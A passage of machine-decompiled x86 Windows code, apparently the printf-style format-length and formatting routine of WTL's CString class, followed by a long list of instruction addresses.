                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									if(_t115 != 0x23) {
                                                                                                                                                                                                                                                                                          										__eflags = _t115 - 0x2a;
                                                                                                                                                                                                                                                                                          										if(_t115 != 0x2a) {
                                                                                                                                                                                                                                                                                          											__eflags = _t115 - 0x2d;
                                                                                                                                                                                                                                                                                          											if(_t115 == 0x2d) {
                                                                                                                                                                                                                                                                                          												goto L13;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												__eflags = _t115 - 0x2b;
                                                                                                                                                                                                                                                                                          												if(_t115 == 0x2b) {
                                                                                                                                                                                                                                                                                          													goto L13;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													__eflags = _t115 - 0x30;
                                                                                                                                                                                                                                                                                          													if(_t115 == 0x30) {
                                                                                                                                                                                                                                                                                          														goto L13;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _t115 - 0x20;
                                                                                                                                                                                                                                                                                          														if(_t115 == 0x20) {
                                                                                                                                                                                                                                                                                          															goto L13;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t156 = _a12;
                                                                                                                                                                                                                                                                                          											_a12 = _t156 + 4;
                                                                                                                                                                                                                                                                                          											_v12 =  *_t156;
                                                                                                                                                                                                                                                                                          											goto L13;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_v8 = _v8 + 2;
                                                                                                                                                                                                                                                                                          										goto L13;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          									L13:
                                                                                                                                                                                                                                                                                          									_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          									_t115 =  *_t191;
                                                                                                                                                                                                                                                                                          								} while (_t115 != 0);
                                                                                                                                                                                                                                                                                          								if(_v12 == _t189) {
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L18:
                                                                                                                                                                                                                                                                                          							_v16 = _t189;
                                                                                                                                                                                                                                                                                          							if( *_t191 == 0x2e) {
                                                                                                                                                                                                                                                                                          								_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          								_push(_t191);
                                                                                                                                                                                                                                                                                          								if( *_t191 != 0x2a) {
                                                                                                                                                                                                                                                                                          									_v16 = E008160F2();
                                                                                                                                                                                                                                                                                          									_t146 =  *_t191;
                                                                                                                                                                                                                                                                                          									_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          									__eflags = _t146;
                                                                                                                                                                                                                                                                                          									if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                                          											_t147 = E008163BE(_t146);
                                                                                                                                                                                                                                                                                          											_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          											__eflags = _t147;
                                                                                                                                                                                                                                                                                          											if(_t147 == 0) {
                                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          											_t146 =  *_t191;
                                                                                                                                                                                                                                                                                          											__eflags = _t146;
                                                                                                                                                                                                                                                                                          											if(_t146 != 0) {
                                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t150 = _a12 + 4;
                                                                                                                                                                                                                                                                                          									_a12 = _t150;
                                                                                                                                                                                                                                                                                          									_v16 =  *((intOrPtr*)(_t150 - 4));
                                                                                                                                                                                                                                                                                          									_t191 = CharNextA(??);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                                                                                          							_t118 =  *_t191;
                                                                                                                                                                                                                                                                                          							_t160 = 0;
                                                                                                                                                                                                                                                                                          							if(_t118 != 0x49 || _t191[1] != 0x36 || _t191[2] != 0x34) {
                                                                                                                                                                                                                                                                                          								_t120 = _t118 + 0xffffffba;
                                                                                                                                                                                                                                                                                          								__eflags = _t120 - 0x26;
                                                                                                                                                                                                                                                                                          								if(_t120 <= 0x26) {
                                                                                                                                                                                                                                                                                          									_t21 = _t120 + 0x805d3c; // 0x8b04c483
                                                                                                                                                                                                                                                                                          									switch( *((intOrPtr*)(( *_t21 & 0x000000ff) * 4 +  &M00805D2C))) {
                                                                                                                                                                                                                                                                                          										case 0:
                                                                                                                                                                                                                                                                                          											L32:
                                                                                                                                                                                                                                                                                          											_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          										case 1:
                                                                                                                                                                                                                                                                                          											_t160 = 0x10000;
                                                                                                                                                                                                                                                                                          											goto L32;
                                                                                                                                                                                                                                                                                          										case 2:
                                                                                                                                                                                                                                                                                          											__ebx = 0x20000;
                                                                                                                                                                                                                                                                                          											goto L32;
                                                                                                                                                                                                                                                                                          										case 3:
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t191 =  &(_t191[3]);
                                                                                                                                                                                                                                                                                          								_t160 = 0x40000;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                                                                                                          							_t122 =  *_t191 | _t160;
                                                                                                                                                                                                                                                                                          							_t212 = _t122 - 0x10063;
                                                                                                                                                                                                                                                                                          							if(_t212 > 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _t122 - 0x20053;
                                                                                                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          									_t123 = _t122 - 0x20063;
                                                                                                                                                                                                                                                                                          									__eflags = _t123;
                                                                                                                                                                                                                                                                                          									if(_t123 == 0) {
                                                                                                                                                                                                                                                                                          										goto L50;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t123 != 0x10;
                                                                                                                                                                                                                                                                                          										if(_t123 != 0x10) {
                                                                                                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L63;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										L63:
                                                                                                                                                                                                                                                                                          										_t136 = _a12 + 4;
                                                                                                                                                                                                                                                                                          										_a12 = _t136;
                                                                                                                                                                                                                                                                                          										_t137 =  *(_t136 - 4);
                                                                                                                                                                                                                                                                                          										__eflags = _t137;
                                                                                                                                                                                                                                                                                          										if(_t137 != 0) {
                                                                                                                                                                                                                                                                                          											_t42 =  &(_t137[0]); // 0x2
                                                                                                                                                                                                                                                                                          											_t183 = _t42;
                                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                                          												_t171 =  *_t137;
                                                                                                                                                                                                                                                                                          												_t137 =  &(_t137[0]);
                                                                                                                                                                                                                                                                                          												__eflags = _t171;
                                                                                                                                                                                                                                                                                          											} while (_t171 != 0);
                                                                                                                                                                                                                                                                                          											goto L47;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t41 =  &(_t137[1]); // 0x6
                                                                                                                                                                                                                                                                                          											_t189 = _t41;
                                                                                                                                                                                                                                                                                          											goto L69;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t122 - 0x10073;
                                                                                                                                                                                                                                                                                          										if(_t122 == 0x10073) {
                                                                                                                                                                                                                                                                                          											goto L51;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											__eflags = _t122 - 0x20043;
                                                                                                                                                                                                                                                                                          											goto L40;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t212 == 0) {
                                                                                                                                                                                                                                                                                          									L50:
                                                                                                                                                                                                                                                                                          									_a12 = _a12 + 4;
                                                                                                                                                                                                                                                                                          									_t189 = 2;
                                                                                                                                                                                                                                                                                          									goto L69;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t213 = _t122 - 0x73;
                                                                                                                                                                                                                                                                                          									if(_t213 > 0) {
                                                                                                                                                                                                                                                                                          										_t141 = _t122 - 0x10043;
                                                                                                                                                                                                                                                                                          										__eflags = _t141;
                                                                                                                                                                                                                                                                                          										if(_t141 == 0) {
                                                                                                                                                                                                                                                                                          											goto L50;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											__eflags = _t141 == 0x10;
                                                                                                                                                                                                                                                                                          											if(_t141 == 0x10) {
                                                                                                                                                                                                                                                                                          												goto L51;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										if(_t213 == 0) {
                                                                                                                                                                                                                                                                                          											L51:
                                                                                                                                                                                                                                                                                          											_t139 = _a12 + 4;
                                                                                                                                                                                                                                                                                          											_a12 = _t139;
                                                                                                                                                                                                                                                                                          											_t140 =  *(_t139 - 4);
                                                                                                                                                                                                                                                                                          											__eflags = _t140;
                                                                                                                                                                                                                                                                                          											if(_t140 != 0) {
                                                                                                                                                                                                                                                                                          												_t134 = lstrlenA(_t140);
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t37 =  &(_t140[6]); // 0x6
                                                                                                                                                                                                                                                                                          												_t189 = _t37;
                                                                                                                                                                                                                                                                                          												goto L69;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											if(_t122 == 0x43) {
                                                                                                                                                                                                                                                                                          												goto L50;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												if(_t122 == 0x53) {
                                                                                                                                                                                                                                                                                          													_t131 = _a12 + 4;
                                                                                                                                                                                                                                                                                          													_a12 = _t131;
                                                                                                                                                                                                                                                                                          													_t132 =  *((intOrPtr*)(_t131 - 4));
                                                                                                                                                                                                                                                                                          													if(_t132 != 0) {
                                                                                                                                                                                                                                                                                          														_t31 = _t132 + 2; // 0x2
                                                                                                                                                                                                                                                                                          														_t183 = _t31;
                                                                                                                                                                                                                                                                                          														do {
                                                                                                                                                                                                                                                                                          															_t170 =  *_t132;
                                                                                                                                                                                                                                                                                          															_t132 = _t132 + 2;
                                                                                                                                                                                                                                                                                          															__eflags = _t170;
                                                                                                                                                                                                                                                                                          														} while (_t170 != 0);
                                                                                                                                                                                                                                                                                          														L47:
                                                                                                                                                                                                                                                                                          														_t133 = _t132 - _t183;
                                                                                                                                                                                                                                                                                          														__eflags = _t133;
                                                                                                                                                                                                                                                                                          														_t134 = _t133 >> 1;
                                                                                                                                                                                                                                                                                          														L48:
                                                                                                                                                                                                                                                                                          														_t189 = _t134;
                                                                                                                                                                                                                                                                                          														__eflags = _t189 - 1;
                                                                                                                                                                                                                                                                                          														if(_t189 >= 1) {
                                                                                                                                                                                                                                                                                          															__eflags = _t189;
                                                                                                                                                                                                                                                                                          															if(_t189 == 0) {
                                                                                                                                                                                                                                                                                          																goto L41;
                                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                                          																goto L69;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_t189 = 1;
                                                                                                                                                                                                                                                                                          															goto L69;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_t30 = _t132 + 6; // 0x6
                                                                                                                                                                                                                                                                                          														_t189 = _t30;
                                                                                                                                                                                                                                                                                          														L69:
                                                                                                                                                                                                                                                                                          														_t124 = _v12;
                                                                                                                                                                                                                                                                                          														if(_t189 <= _t124) {
                                                                                                                                                                                                                                                                                          															_t189 = _t124;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														_t125 = _v16;
                                                                                                                                                                                                                                                                                          														if(_t125 == 0 || _t189 < _t125) {
                                                                                                                                                                                                                                                                                          															goto L81;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_v8 = _v8 + _t125;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t216 = _t122 - 0x63;
                                                                                                                                                                                                                                                                                          													L40:
                                                                                                                                                                                                                                                                                          													if(_t216 == 0) {
                                                                                                                                                                                                                                                                                          														goto L50;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														L41:
                                                                                                                                                                                                                                                                                          														_t128 =  *_t191 + 0xffffffbb;
                                                                                                                                                                                                                                                                                          														if(_t128 > 0x33) {
                                                                                                                                                                                                                                                                                          															L81:
                                                                                                                                                                                                                                                                                          															_v8 = _v8 + _t189;
                                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                                          															_t24 = _t128 + 0x805d78; // 0xff5608eb
                                                                                                                                                                                                                                                                                          															switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M00805D64))) {
                                                                                                                                                                                                                                                                                          																case 0:
                                                                                                                                                                                                                                                                                          																	OutputDebugStringA("Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.");
                                                                                                                                                                                                                                                                                          																	DebugBreak();
                                                                                                                                                                                                                                                                                          																	_v8 = _v8 + __edi;
                                                                                                                                                                                                                                                                                          																	__ebx = CharNextA;
                                                                                                                                                                                                                                                                                          																	goto L83;
                                                                                                                                                                                                                                                                                          																case 1:
                                                                                                                                                                                                                                                                                          																	__eflags = __ebx & 0x00040000;
                                                                                                                                                                                                                                                                                          																	if((__ebx & 0x00040000) == 0) {
                                                                                                                                                                                                                                                                                          																		goto L76;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		_a12 = _a12 + 8;
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																	goto L77;
                                                                                                                                                                                                                                                                                          																case 2:
                                                                                                                                                                                                                                                                                          																	_t59 =  &_a12;
                                                                                                                                                                                                                                                                                          																	 *_t59 = _a12 + 4;
                                                                                                                                                                                                                                                                                          																	__eflags =  *_t59;
                                                                                                                                                                                                                                                                                          																	goto L81;
                                                                                                                                                                                                                                                                                          																case 3:
                                                                                                                                                                                                                                                                                          																	L76:
                                                                                                                                                                                                                                                                                          																	_t51 =  &_a12;
                                                                                                                                                                                                                                                                                          																	 *_t51 = _a12 + 4;
                                                                                                                                                                                                                                                                                          																	__eflags =  *_t51;
                                                                                                                                                                                                                                                                                          																	L77:
                                                                                                                                                                                                                                                                                          																	__eax = _v16;
                                                                                                                                                                                                                                                                                          																	__eax = _v16 + _v12;
                                                                                                                                                                                                                                                                                          																	__edi = 0x20;
                                                                                                                                                                                                                                                                                          																	__eflags = __eax - 0x20;
                                                                                                                                                                                                                                                                                          																	if(__eax < 0x20) {
                                                                                                                                                                                                                                                                                          																		goto L81;
                                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                                          																		__ebx = CharNextA;
                                                                                                                                                                                                                                                                                          																		__edi = __eax;
                                                                                                                                                                                                                                                                                          																		_v8 = _v8 + __edi;
                                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                                          																	goto L83;
                                                                                                                                                                                                                                                                                          																case 4:
                                                                                                                                                                                                                                                                                          																	goto L81;
                                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                                          					_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t174 = _a4;
                                                                                                                                                                                                                                                                                          				_t88 =  *_a4;
                                                                                                                                                                                                                                                                                          				_t186 = _v8;
                                                                                                                                                                                                                                                                                          				_t68 = _t88 - 0xc; // -12
                                                                                                                                                                                                                                                                                          				_t192 = _t68;
                                                                                                                                                                                                                                                                                          				if( *(_t88 - 0xc) > 1 || _t186 >  *((intOrPtr*)(_t88 - 4))) {
                                                                                                                                                                                                                                                                                          					_t158 =  *((intOrPtr*)(_t88 - 8));
                                                                                                                                                                                                                                                                                          					if(_v8 < _t158) {
                                                                                                                                                                                                                                                                                          						_t186 = _t158;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(E00805E70(_t174) == 0) {
                                                                                                                                                                                                                                                                                          						goto L95;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t91 = _t158 + 1;
                                                                                                                                                                                                                                                                                          						if(_t186 + 1 >= _t158 + 1) {
                                                                                                                                                                                                                                                                                          							_t74 =  &(_t192[3]); // 0xd
                                                                                                                                                                                                                                                                                          							E008196A0( *_a4, _t74, _t91);
                                                                                                                                                                                                                                                                                          							_t195 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_a4 - 8)) = _t158;
                                                                                                                                                                                                                                                                                          						if(_t192 != 0x86ad20 && InterlockedDecrement(_t192) <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t192);
                                                                                                                                                                                                                                                                                          							E008162C2();
                                                                                                                                                                                                                                                                                          							_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L94;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					L94:
                                                                                                                                                                                                                                                                                          					_t188 = _a4;
                                                                                                                                                                                                                                                                                          					_t93 =  *_t188;
                                                                                                                                                                                                                                                                                          					if(_t93 != 0) {
                                                                                                                                                                                                                                                                                          						wvsprintfA(_t93, _a8, _v20);
                                                                                                                                                                                                                                                                                          						_t95 =  *_t188;
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t95 - 0xc) - 1;
                                                                                                                                                                                                                                                                                          						_t81 = _t95 - 0xc; // -12
                                                                                                                                                                                                                                                                                          						_t193 = _t81;
                                                                                                                                                                                                                                                                                          						if( *(_t95 - 0xc) > 1) {
                                                                                                                                                                                                                                                                                          							__eflags =  &(_t95[0xfffffffffffffff4]) - 0x86ad20;
                                                                                                                                                                                                                                                                                          							if( &(_t95[0xfffffffffffffff4]) != 0x86ad20) {
                                                                                                                                                                                                                                                                                          								_t104 = InterlockedDecrement(_t193);
                                                                                                                                                                                                                                                                                          								__eflags = _t104;
                                                                                                                                                                                                                                                                                          								if(_t104 <= 0) {
                                                                                                                                                                                                                                                                                          									_t181 =  *_t188 - 0xc;
                                                                                                                                                                                                                                                                                          									__eflags = _t181;
                                                                                                                                                                                                                                                                                          									_push(_t181);
                                                                                                                                                                                                                                                                                          									E008162C2();
                                                                                                                                                                                                                                                                                          									_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t105 =  *0x86ad30; // 0x86ad2c
                                                                                                                                                                                                                                                                                          								 *_t188 = _t105;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t100 = E00805E70(_t188);
                                                                                                                                                                                                                                                                                          							__eflags = _t100;
                                                                                                                                                                                                                                                                                          							if(_t100 != 0) {
                                                                                                                                                                                                                                                                                          								_t168 =  *_t188;
                                                                                                                                                                                                                                                                                          								_t102 = 1 + _t193[1];
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_t168 - 4)) + 1 - _t102;
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_t168 - 4)) + 1 >= _t102) {
                                                                                                                                                                                                                                                                                          									__eflags =  &(_t193[3]);
                                                                                                                                                                                                                                                                                          									E008196A0(_t168,  &(_t193[3]), _t102);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t97 = lstrlenA( *_t188);
                                                                                                                                                                                                                                                                                          						 *( *_t188 - 8) = _t97;
                                                                                                                                                                                                                                                                                          						( *_t188)[_t97] = 0;
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						L95:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























































                                                                                                                                                                                                                                                                                          0x0080591b
                                                                                                                                                                                                                                                                                          0x00805922
                                                                                                                                                                                                                                                                                          0x00805925
                                                                                                                                                                                                                                                                                          0x0080592c
                                                                                                                                                                                                                                                                                          0x00805943
                                                                                                                                                                                                                                                                                          0x00805c05
                                                                                                                                                                                                                                                                                          0x00805c06
                                                                                                                                                                                                                                                                                          0x00805c0a
                                                                                                                                                                                                                                                                                          0x00805c0a
                                                                                                                                                                                                                                                                                          0x00805c0a
                                                                                                                                                                                                                                                                                          0x00805949
                                                                                                                                                                                                                                                                                          0x0080594c
                                                                                                                                                                                                                                                                                          0x0080594e
                                                                                                                                                                                                                                                                                          0x00805952
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805958
                                                                                                                                                                                                                                                                                          0x00805958
                                                                                                                                                                                                                                                                                          0x0080595a
                                                                                                                                                                                                                                                                                          0x0080595f
                                                                                                                                                                                                                                                                                          0x0080599f
                                                                                                                                                                                                                                                                                          0x0080599f
                                                                                                                                                                                                                                                                                          0x008059a5
                                                                                                                                                                                                                                                                                          0x008059a8
                                                                                                                                                                                                                                                                                          0x008059aa
                                                                                                                                                                                                                                                                                          0x008059af
                                                                                                                                                                                                                                                                                          0x008059b1
                                                                                                                                                                                                                                                                                          0x008059b5
                                                                                                                                                                                                                                                                                          0x008059ba
                                                                                                                                                                                                                                                                                          0x008059bf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008059c4
                                                                                                                                                                                                                                                                                          0x008059c6
                                                                                                                                                                                                                                                                                          0x008059ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008059ca
                                                                                                                                                                                                                                                                                          0x008059b1
                                                                                                                                                                                                                                                                                          0x00805961
                                                                                                                                                                                                                                                                                          0x00805961
                                                                                                                                                                                                                                                                                          0x00805963
                                                                                                                                                                                                                                                                                          0x0080596b
                                                                                                                                                                                                                                                                                          0x0080596d
                                                                                                                                                                                                                                                                                          0x0080597f
                                                                                                                                                                                                                                                                                          0x00805981
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805983
                                                                                                                                                                                                                                                                                          0x00805983
                                                                                                                                                                                                                                                                                          0x00805985
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805987
                                                                                                                                                                                                                                                                                          0x00805987
                                                                                                                                                                                                                                                                                          0x00805989
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080598b
                                                                                                                                                                                                                                                                                          0x0080598b
                                                                                                                                                                                                                                                                                          0x0080598d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080598d
                                                                                                                                                                                                                                                                                          0x00805989
                                                                                                                                                                                                                                                                                          0x00805985
                                                                                                                                                                                                                                                                                          0x0080596f
                                                                                                                                                                                                                                                                                          0x0080596f
                                                                                                                                                                                                                                                                                          0x00805977
                                                                                                                                                                                                                                                                                          0x0080597a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080597a
                                                                                                                                                                                                                                                                                          0x00805965
                                                                                                                                                                                                                                                                                          0x00805965
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805965
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080598f
                                                                                                                                                                                                                                                                                          0x00805992
                                                                                                                                                                                                                                                                                          0x00805994
                                                                                                                                                                                                                                                                                          0x00805996
                                                                                                                                                                                                                                                                                          0x0080599d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080599d
                                                                                                                                                                                                                                                                                          0x008059cc
                                                                                                                                                                                                                                                                                          0x008059cf
                                                                                                                                                                                                                                                                                          0x008059d2
                                                                                                                                                                                                                                                                                          0x008059d7
                                                                                                                                                                                                                                                                                          0x008059dc
                                                                                                                                                                                                                                                                                          0x008059dd
                                                                                                                                                                                                                                                                                          0x008059f9
                                                                                                                                                                                                                                                                                          0x008059fc
                                                                                                                                                                                                                                                                                          0x008059fe
                                                                                                                                                                                                                                                                                          0x00805a01
                                                                                                                                                                                                                                                                                          0x00805a03
                                                                                                                                                                                                                                                                                          0x00805a05
                                                                                                                                                                                                                                                                                          0x00805a09
                                                                                                                                                                                                                                                                                          0x00805a0e
                                                                                                                                                                                                                                                                                          0x00805a11
                                                                                                                                                                                                                                                                                          0x00805a13
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a18
                                                                                                                                                                                                                                                                                          0x00805a1a
                                                                                                                                                                                                                                                                                          0x00805a1c
                                                                                                                                                                                                                                                                                          0x00805a1e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a1e
                                                                                                                                                                                                                                                                                          0x00805a05
                                                                                                                                                                                                                                                                                          0x008059df
                                                                                                                                                                                                                                                                                          0x008059e2
                                                                                                                                                                                                                                                                                          0x008059e5
                                                                                                                                                                                                                                                                                          0x008059eb
                                                                                                                                                                                                                                                                                          0x008059f0
                                                                                                                                                                                                                                                                                          0x008059f0
                                                                                                                                                                                                                                                                                          0x008059dd
                                                                                                                                                                                                                                                                                          0x00805a20
                                                                                                                                                                                                                                                                                          0x00805a20
                                                                                                                                                                                                                                                                                          0x00805a22
                                                                                                                                                                                                                                                                                          0x00805a26
                                                                                                                                                                                                                                                                                          0x00805a41
                                                                                                                                                                                                                                                                                          0x00805a44
                                                                                                                                                                                                                                                                                          0x00805a47
                                                                                                                                                                                                                                                                                          0x00805a49
                                                                                                                                                                                                                                                                                          0x00805a50
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a63
                                                                                                                                                                                                                                                                                          0x00805a6a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a57
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a5e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a50
                                                                                                                                                                                                                                                                                          0x00805a34
                                                                                                                                                                                                                                                                                          0x00805a34
                                                                                                                                                                                                                                                                                          0x00805a37
                                                                                                                                                                                                                                                                                          0x00805a37
                                                                                                                                                                                                                                                                                          0x00805a6c
                                                                                                                                                                                                                                                                                          0x00805a6f
                                                                                                                                                                                                                                                                                          0x00805a71
                                                                                                                                                                                                                                                                                          0x00805a76
                                                                                                                                                                                                                                                                                          0x00805b31
                                                                                                                                                                                                                                                                                          0x00805b36
                                                                                                                                                                                                                                                                                          0x00805b4b
                                                                                                                                                                                                                                                                                          0x00805b4b
